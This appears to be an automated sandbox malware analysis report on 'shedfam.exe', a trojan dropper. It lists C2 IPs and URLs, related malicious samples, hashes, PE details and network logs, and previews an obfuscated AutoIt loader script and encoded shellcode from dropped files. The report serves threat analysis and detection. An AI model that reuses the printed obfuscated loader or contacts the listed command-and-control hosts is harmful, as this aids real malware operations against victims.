                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@9/5@3/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 30.3% (good quality ratio 28.2%)
                        • Quality average: 70.2%
                        • Quality standard deviation: 31.7%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 81
                        • Number of non-executed functions: 318
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        No simulations
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        103.100.63.146SecuriteInfo.com.Exploit.CVE-2018-0798.4.18556.26388.rtfGet hashmaliciousBrowse
                        • www.73129.vip/sk19/?fDHP=3fkXYR9hz&SJElJ=QEAmWZfWRmzsIdK09pUtXBuIHlMFTiZNz3ekHIA6BAt73q/fTcGY86u1uRL9kDNcPWyWIQ==
                        C0kXpdDmus.exeGet hashmaliciousBrowse
                        • www.3559.fyi/pdrq/?-ZkP=tyrJo2DsLqAFCkyHUXQ1b8K3fbGeVX4/XbO/LpG7QkepypcVi9hBkcMg9USsvw3+2JPE&5j=7nRhzPYXe2
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        www.73129.vipSecuriteInfo.com.Exploit.CVE-2018-0798.4.18556.26388.rtfGet hashmaliciousBrowse
                        • 103.100.63.146
                        www.autonomaat.comO1xUBS7Wyu.exeGet hashmaliciousBrowse
                        • 54.67.93.101
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        AMAZON-02UShttps://protect-za.mimecast.com/s/uPmFCMjBBwFvRZPBIwJQlBT?domain=s3.amazonaws.comGet hashmaliciousBrowse
                        • 52.217.198.0
                        2022-571-GLS.exeGet hashmaliciousBrowse
                        • 75.2.81.221
                        c7oqCiKzbF.exeGet hashmaliciousBrowse
                        • 52.217.136.121
                        http://xmas-art.ru/fo/ufmavtiwaehat-sejautfoja/haotwaep/376197/?T=44g47k0c-8q-1q1QZ44igflammatiojb&vfilclszdwwrqimq5-t-nsnba=contyasseursSZ6J2Get hashmaliciousBrowse
                        • 108.138.47.14
                        http://bitbucket.org/fgsdsaewrewf/downsreps1/downloads/git-scm.zipGet hashmaliciousBrowse
                        • 104.192.141.1
                        Scan-29-11-2022.xlsGet hashmaliciousBrowse
                        • 99.83.154.118
                        ABJLRCJkcK.exeGet hashmaliciousBrowse
                        • 52.213.209.223
                        j7PXQpqMtK.exeGet hashmaliciousBrowse
                        • 3.69.157.220
                        H7mlOrX044.exeGet hashmaliciousBrowse
                        • 52.48.35.88
                        https://ipfs.io/ipfs/QmZscYPiZiEyUufsiTp73rjGySUVKx6mbYrEnns9n7DNVh?filename=ownredirectautoweb.html#news@pitchfork.comGet hashmaliciousBrowse
                        • 54.77.145.5
                        GyKpRhKQY1.elfGet hashmaliciousBrowse
                        • 176.34.218.154
                        kTK22xqEq6.elfGet hashmaliciousBrowse
                        • 199.47.130.12
                        8kH56VSq58.elfGet hashmaliciousBrowse
                        • 65.1.39.239
                        https://app.smartsheet.com/b/download/att/1/7953430800033668/2d1kcfy3a3mgsxdrbomrc9v3joGet hashmaliciousBrowse
                        • 52.216.141.30
                        https://linktfetn.ccGet hashmaliciousBrowse
                        • 65.9.44.9
                        payment_copy4_receipt.exeGet hashmaliciousBrowse
                        • 75.2.115.196
                        Check#33743_pymntCopy_pdf.htmGet hashmaliciousBrowse
                        • 3.72.140.173
                        https://firerite1-my.sharepoint.com/:o:/g/personal/luke_firerite_co_uk/EgX55biPFdZEjA-OHgYPtTQBt8i3-MO-Jg7Sa3pYTRp-_Q?e=5%3aStgzAn&at=9Get hashmaliciousBrowse
                        • 3.124.173.63
                        https://linkprotect.cudasvc.com/url?a=https%3a%2f%2flnewmanbunnellelectric.com%2f&c=E,1,-SmOrItRkzmIjK3rKUS4lI02RvsfWzGdZ1HnCIT5Pt230osjD6mDrVCNiu4teQwo-lwx2RA8Bs1QUO7XeVgh7bu1527soTNm0HME39Y1hPc-NQmLQw,,&typo=1Get hashmaliciousBrowse
                        • 3.120.60.67
                        SkyNet.1448.exeGet hashmaliciousBrowse
                        • 15.222.3.19
                        YISUCLOUDLTD-AS-APYISUCLOUDLTDHKSecuriteInfo.com.Exploit.CVE-2018-0798.4.18556.26388.rtfGet hashmaliciousBrowse
                        • 103.100.63.146
                        payment copy_$31,400.exeGet hashmaliciousBrowse
                        • 154.209.7.241
                        Lserskarers.exeGet hashmaliciousBrowse
                        • 154.213.29.126
                        NEW ORDER.xlsGet hashmaliciousBrowse
                        • 154.213.29.126
                        pitUbg1Fc9.exeGet hashmaliciousBrowse
                        • 154.213.29.126
                        TWO_MONTHS_SALARY_RECEIPT.exeGet hashmaliciousBrowse
                        • 154.213.29.16
                        2W2wNDLhsl.exeGet hashmaliciousBrowse
                        • 154.213.29.16
                        Group_invitation.exeGet hashmaliciousBrowse
                        • 154.213.29.16
                        Group_IV.exeGet hashmaliciousBrowse
                        • 154.213.29.16
                        Group_Invitation.exeGet hashmaliciousBrowse
                        • 154.213.29.16
                        GROUP INVITATION.exeGet hashmaliciousBrowse
                        • 154.213.29.16
                        CONFIRMAR DOCUMENTO DE PAGO.exeGet hashmaliciousBrowse
                        • 103.107.238.138
                        sDeDgYPD12.elfGet hashmaliciousBrowse
                        • 154.209.6.29
                        C0kXpdDmus.exeGet hashmaliciousBrowse
                        • 103.100.63.146
                        doc_584589921482-939583064810.pdf.vbsGet hashmaliciousBrowse
                        • 154.213.28.166
                        SecuriteInfo.com.Trojan.DownLoader44.65070.11978.exeGet hashmaliciousBrowse
                        • 154.213.29.16
                        Yeni sipari#U015f _No.129099, pdf.exeGet hashmaliciousBrowse
                        • 103.100.63.209
                        PO2204-00011.exeGet hashmaliciousBrowse
                        • 154.197.2.146
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        C:\Users\user\AppData\Local\Temp\kmhbvf.exevbc.exeGet hashmaliciousBrowse
                          Details List and Specification.exeGet hashmaliciousBrowse
                            MCS-DECEMBER ORDER-PROJECT PDF.exeGet hashmaliciousBrowse
                              fL6O9HHehH.exeGet hashmaliciousBrowse
                                2211.exeGet hashmaliciousBrowse
                                  winlogon.exeGet hashmaliciousBrowse
                                    RFQ FILES DTD NOVEMBER 2022.xlsGet hashmaliciousBrowse
                                      swiftX24-11-2022.xlsGet hashmaliciousBrowse
                                        file.exeGet hashmaliciousBrowse
                                          file.exeGet hashmaliciousBrowse
                                            SecuriteInfo.com.Trojan.Siggen18.59138.29444.26902.exeGet hashmaliciousBrowse
                                              mko.exeGet hashmaliciousBrowse
                                                BL-SHIPPING DOCUMENTS.exeGet hashmaliciousBrowse
                                                  RPO-09876543456.exeGet hashmaliciousBrowse
                                                    file.exeGet hashmaliciousBrowse
                                                      file.exeGet hashmaliciousBrowse
                                                        file.exeGet hashmaliciousBrowse
                                                          SRNQ18pSff.exeGet hashmaliciousBrowse
                                                            BankDetails(DTL202210).xlsGet hashmaliciousBrowse
                                                              0591364.exeGet hashmaliciousBrowse
                                                                Process:C:\Users\user\Desktop\shedfam.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):66710
                                                                Entropy (8bit):3.5882360502901314
                                                                Encrypted:false
                                                                SSDEEP:384:QvCbSUvegVHfqXqgdbn2irCAnbYv853oADrWdREGu/g74s65jniENIVfpWJ769Vs:tLriH9nEv8yAGo9rsm+VhFDs
                                                                MD5:431EB080C0121588DF787ADE07921631
                                                                SHA1:51225D617EB675000CD546296200A3394BE6E3E5
                                                                SHA-256:E2D19473BB19AD0753170CBEB884714EC463E9F7836876F0174509FED54DFB6B
                                                                SHA-512:C7CF3F965FE741D6D98E06BAE9EE12CEADF6FF93574E03DBC2B9EB9336B4A9C23285B3DC3BBCBCD9D8B21C6E91BB92FB65B2995205AB8AAA5794FDA3FC614136
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:0xe9220FF4500BBBVFDA580462000064a13000FF4500BBBVFDA5804600008FF4500BBBVFDA58046b4FF4500BBBVFDA580460FF4500BBBVFDA580460c8b40FF4500BBBVFDA580460c8b008FF4500BBBVFDA58046b008FF4500BBBVFDA58046b4018FF4500BBBVFDA58046c35FF4500BBBVFDA580465FF4500BBBVFDA580468becFF4500BBBVFDA5804664a13FF4500BBBVFDA580460FF4500BBBVFDA5804600000056578bFF4500BBBVFDA58046400c8b7FF4500BBBVFDA5804680c8bf7ff7508FF4500BBBVFDA58046ff7FF4500BBBVFDA580466FF4500BBBVFDA580463FF4500BBBVFDA580460e81FF4500BBBVFDA58046201000085c07FF4500BBBVFDA5804640a8b363bf775FF4500BBBVFDA58046eb33c0ebFF4500BBBVFDA58046038b46285f5eFF4500BBBVFDA580465dFF4500BBBVFDA58046c2040FF4500BBBVFDA580460FF4500BBBVFDA58046558bec568b75FF4500BBBVFDA5804608ba26FF4500BBBVFDA580462FF4500BBBVFDA58046300005FF4500BBBVFDA580467eb0eFF4500BBBVFDA580468FF4500BBBVFDA58046bFF4500BBBVFDA58046caFF4500BBBVFDA58046dFF4500BBBVFDA580461e8c1FF4500BBBVFDA58046e10FF4500BBBVFDA5804674FF4500BBBVFDA580466FF4500BBBVFDA580460bFF4500BBBVFDA58046c803cf03dFF4500BBBVFDA5804610FF4500BBB
                                                                Process:C:\Users\user\Desktop\shedfam.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):893608
                                                                Entropy (8bit):6.620131693023677
                                                                Encrypted:false
                                                                SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                                MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                                SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                                SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                                SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                Joe Sandbox View:
                                                                • Filename: vbc.exe, Detection: malicious, Browse
                                                                • Filename: Details List and Specification.exe, Detection: malicious, Browse
                                                                • Filename: MCS-DECEMBER ORDER-PROJECT PDF.exe, Detection: malicious, Browse
                                                                • Filename: fL6O9HHehH.exe, Detection: malicious, Browse
                                                                • Filename: 2211.exe, Detection: malicious, Browse
                                                                • Filename: winlogon.exe, Detection: malicious, Browse
                                                                • Filename: RFQ FILES DTD NOVEMBER 2022.xls, Detection: malicious, Browse
                                                                • Filename: swiftX24-11-2022.xls, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: SecuriteInfo.com.Trojan.Siggen18.59138.29444.26902.exe, Detection: malicious, Browse
                                                                • Filename: mko.exe, Detection: malicious, Browse
                                                                • Filename: BL-SHIPPING DOCUMENTS.exe, Detection: malicious, Browse
                                                                • Filename: RPO-09876543456.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: SRNQ18pSff.exe, Detection: malicious, Browse
                                                                • Filename: BankDetails(DTL202210).xls, Detection: malicious, Browse
                                                                • Filename: 0591364.exe, Detection: malicious, Browse
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\shedfam.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1161271
                                                                Entropy (8bit):7.006804288931609
                                                                Encrypted:false
                                                                SSDEEP:12288:ldtfUML9HQFpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawVx:lLsNT3E53Myyzl0hMf1tr7Caw8M0A
                                                                MD5:5FF42BDDBCC182E0FCC90781FAD2728A
                                                                SHA1:EAD63E8B5973CCE5218306D11BF622BCBDFE2A7F
                                                                SHA-256:A003F5F08AAE6F3DF16215ED1EC97315A7DD79D4B3488F6D8114189B16ABB176
                                                                SHA-512:0CF8E7376574478DE2C161CE96B2EBDC27996FE5E35EDA137579F915831EB5A101A4753A789BF35CBD9A20B6AAA50B8432F8465D60F32843D49A174AA74C2318
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:........,...................I...............................................................................................................................................................................................................................................................J...............F...j...........................................................................................................................................#...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\shedfam.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):189440
                                                                Entropy (8bit):7.991287376939625
                                                                Encrypted:true
                                                                SSDEEP:3072:WKYGVE/xY13tv+Fm7mNamHwvyWiIwl0dxFtMO7i0b5WAL7m8GPRfZiMBV:+GVdtyLad0lMLb5bjTMBV
                                                                MD5:DC7CD66F3A1B920FE91A5550F1B95608
                                                                SHA1:C72EB7822DA4656A6F0A391847FE8A76564572E3
                                                                SHA-256:DB73C93C0D9FC5B23B95D9CB5D8BD402914999BA59B3D6C90B4DAC8E7DC302E6
                                                                SHA-512:3C030A853C7C345A3C93E53D015C51A91986AE4DB4AB13E4730C9FFB2EAAFBF62C65A5D11FBA21B810A6CDAAB3CAEBFE48CE36D960AF54294CB55D7F108101FE
                                                                Malicious:false
                                                                Preview:..R.1..$. .<.hj..@.....r.....x6....q..x9.|.G.%..".........j.h..V..s....l.j.V....Z.j a......<.2m?gMZa).u5.O:.Z.b.......<..q....f..-.......T........Y..,M.H[..z......o.*...o.==...^...?.....j(H.8.....7.Z.o.).;.J........-.v...}.q.Dqe....~.G.........L.'6..0..Q..7B9.qV.8.....q9..x94|.V.%.."........j...TV..x.2F..2.-.{6SCNU.`v..y...Y!.."....R<.0.G...........<*...*..c...+.cD.R.2/.+;.M.jR.....M.8#./.'o...h..o.*...o....FG.^....6...xZ.........^7y.g..)x10.........-cp...}..Dqe...n..~.G......$.L.'6...Qh.7B9.q.x6....q..x9.|.G.%.."........j...TV..x.2F..2.-.{6SCNU.`v..y...Y!.."....R<.0.G...........<*...*..c...+.cD.R.2/.+;.M.jR.....M.8#./.'o...h..o.*...o.==...^.]?.6d..x~...8.....^7y.g..).10J........-cp...}..Dqe...n..~.G......$.L.'6...Qh.7B9.q.x6....q..x9.|.G.%.."........j...TV..x.2F..2.-.{6SCNU.`v..y...Y!.."....R<.0.G...........<*...*..c...+.cD.R.2/.+;.M.jR.....M.8#./.'o...h..o.*...o.==...^.]?.6d..x~...8.....^7y.g..).10J........
                                                                Process:C:\Users\user\Desktop\shedfam.exe
                                                                File Type:ASCII text, with very long lines (1182), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):6409
                                                                Entropy (8bit):4.539976822490987
                                                                Encrypted:false
                                                                SSDEEP:48:Adcp3cMcpp4c/NenP+h+OqbQALctNfP7CRvNrgBRyKSPXPXtXtXdhVcGgypVdAyq:AdeLvoIP+gOqb5Y78NcCHy3mPgAe
                                                                MD5:F94D60D73EEED59DB9C9EA910387DF5E
                                                                SHA1:A7A5D3AD43B240813CA47DD550D0632E0CC1B846
                                                                SHA-256:35D0A39DEB3A4CA1DD624D441359A320A89F044476BA5665EED31C4E51019C2C
                                                                SHA-512:E6CE3DB8563F4ED6989562FA0FBB561DAEB9E022B72D6EB746AE1181B2018633C7F22A0F2AE591D14D794340AA54A4699480219266E9B81E04A1A1D67F8FA983
                                                                Malicious:false
                                                                Preview:Global $K30ry88 = 227429608..Global $X31w8rp1 = 1313542..Global $A324so = Chr..Global $P334kwt0hcp = Execute..Global $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-6550) & $A324so(6667-6550) & $A324so(6649-6550) & $A324so(6666-6550) & $A324so(6633-6550) & $A324so(6651-6550) & $A324so(6666-6550) & $A324so(6618-6550) & $A324so(6647-6550) & $A324so(6666-6550) & $A324so(6647-6550))..Global $B3232eqg0zi8 = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-6550) & $A324so(6667-6550) & $A324so(6649-6550) & $A324so(6666-6550) & $A324so(6617-6550) & $A324so(6664-6550) & $A324so(6651-6550) & $A324so(6647-6550) & $A324so(6666-6550) & $A324so(6651-6550))..Global $F3339x28s = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6617-6550) & $A324so(6647-6550) & $A324so(6658-6550) & $A324so(6658-65
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):6.818960528918014
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:shedfam.exe
                                                                File size:901270
                                                                MD5:c0a85d86855b257b25572aa7d9d90381
                                                                SHA1:ea5ce824d225c0df297586a2c6621aea5ab8584b
                                                                SHA256:c9cf9f0fa6980019aa3a93b9b25ca2cf14cfad4b4afef12d43a20ece34d2093b
                                                                SHA512:373c768311b5385bb45c0558a1bc112c5c8b4d9cceeb5fa41577a5a4f3a936aff6745bf0d6ac3fdc84a17d3eb518cce5d1e4744cdfe64cd35e4478a8693fd11a
                                                                SSDEEP:12288:Avy7P+vzXkpdeYfU+Ey0LOPmEBrNU4jMmrKJVNwysiebm4M4qXftsFf:yAmvgeYc+EAPmEVNSmObWy7eCn4OtsFf
                                                                TLSH:1F1502517F04C5A2C51D19F6CBEFE16C92F28CA2190198336760BE2E3CFEF9268255B5
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.*]...RF..RG.pRF.*]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........
                                                                Icon Hash:5c1cf8c8e970f1c8
                                                                Entrypoint:0x40324f
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:ab6770b0a8635b9d92a5838920cfe770
                                                                Instruction
                                                                sub esp, 00000180h
                                                                push ebx
                                                                push ebp
                                                                push esi
                                                                push edi
                                                                xor ebx, ebx
                                                                push 00008001h
                                                                mov dword ptr [esp+1Ch], ebx
                                                                mov dword ptr [esp+14h], 00409130h
                                                                xor esi, esi
                                                                mov byte ptr [esp+18h], 00000020h
                                                                call dword ptr [004070B8h]
                                                                call dword ptr [004070B4h]
                                                                cmp ax, 00000006h
                                                                je 00007F0A94F2A453h
                                                                push ebx
                                                                call 00007F0A94F2D241h
                                                                cmp eax, ebx
                                                                je 00007F0A94F2A449h
                                                                push 00000C00h
                                                                call eax
                                                                push 004091E0h
                                                                call 00007F0A94F2D1C2h
                                                                push 004091D8h
                                                                call 00007F0A94F2D1B8h
                                                                push 004091CCh
                                                                call 00007F0A94F2D1AEh
                                                                push 0000000Dh
                                                                call 00007F0A94F2D211h
                                                                push 0000000Bh
                                                                call 00007F0A94F2D20Ah
                                                                mov dword ptr [00423F84h], eax
                                                                call dword ptr [00407034h]
                                                                push ebx
                                                                call dword ptr [00407270h]
                                                                mov dword ptr [00424038h], eax
                                                                push ebx
                                                                lea eax, dword ptr [esp+34h]
                                                                push 00000160h
                                                                push eax
                                                                push ebx
                                                                push 0041F538h
                                                                call dword ptr [00407160h]
                                                                push 004091C0h
                                                                push 00423780h
                                                                call 00007F0A94F2CE41h
                                                                call dword ptr [004070B0h]
                                                                mov ebp, 0042A000h
                                                                push eax
                                                                push ebp
                                                                call 00007F0A94F2CE2Fh
                                                                push ebx
                                                                call dword ptr [00407144h]
                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x73cc0xa0.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x490d0.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x5c4a0x5e00False0.659906914893617data6.410763775060762IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x70000x115e0x1200False0.4466145833333333data5.142548180775325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x90000x1b0780x600False0.455078125data4.2252195571372315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x2d0000x490d00x49200False0.1362446581196581data2.9633699887836995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountry
                                                                RT_ICON0x2d3100x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States
                                                                RT_ICON0x6f3380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                                RT_ICON0x718e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                                RT_ICON0x729880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                                RT_ICON0x738300x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                                RT_ICON0x741b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                                                RT_ICON0x74a600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                                                                RT_ICON0x751280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                                RT_ICON0x756900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                                RT_DIALOG0x75af80x100dataEnglishUnited States
                                                                RT_DIALOG0x75bf80x11cdataEnglishUnited States
                                                                RT_DIALOG0x75d180x60dataEnglishUnited States
                                                                RT_GROUP_ICON0x75d780x84dataEnglishUnited States
                                                                RT_MANIFEST0x75e000x2ccXML 1.0 document, ASCII text, with very long lines (716), with no line terminatorsEnglishUnited States
                                                                DLLImport
                                                                KERNEL32.dllSetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
                                                                USER32.dllGetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 29, 2022 15:13:30.139664888 CET4969980192.168.2.318.167.242.213
                                                                Nov 29, 2022 15:13:30.344316006 CET804969918.167.242.213192.168.2.3
                                                                Nov 29, 2022 15:13:30.348556042 CET4969980192.168.2.318.167.242.213
                                                                Nov 29, 2022 15:13:30.348653078 CET4969980192.168.2.318.167.242.213
                                                                Nov 29, 2022 15:13:30.553149939 CET804969918.167.242.213192.168.2.3
                                                                Nov 29, 2022 15:13:30.580126047 CET804969918.167.242.213192.168.2.3
                                                                Nov 29, 2022 15:13:30.580183983 CET804969918.167.242.213192.168.2.3
                                                                Nov 29, 2022 15:13:30.580450058 CET4969980192.168.2.318.167.242.213
                                                                Nov 29, 2022 15:13:30.580521107 CET4969980192.168.2.318.167.242.213
                                                                Nov 29, 2022 15:13:30.785156012 CET804969918.167.242.213192.168.2.3
                                                                Nov 29, 2022 15:13:51.134776115 CET4970080192.168.2.3103.100.63.146
                                                                Nov 29, 2022 15:13:51.420519114 CET8049700103.100.63.146192.168.2.3
                                                                Nov 29, 2022 15:13:51.420717001 CET4970080192.168.2.3103.100.63.146
                                                                Nov 29, 2022 15:13:51.421838045 CET4970080192.168.2.3103.100.63.146
                                                                Nov 29, 2022 15:13:51.707523108 CET8049700103.100.63.146192.168.2.3
                                                                Nov 29, 2022 15:13:51.719268084 CET8049700103.100.63.146192.168.2.3
                                                                Nov 29, 2022 15:13:51.719347954 CET8049700103.100.63.146192.168.2.3
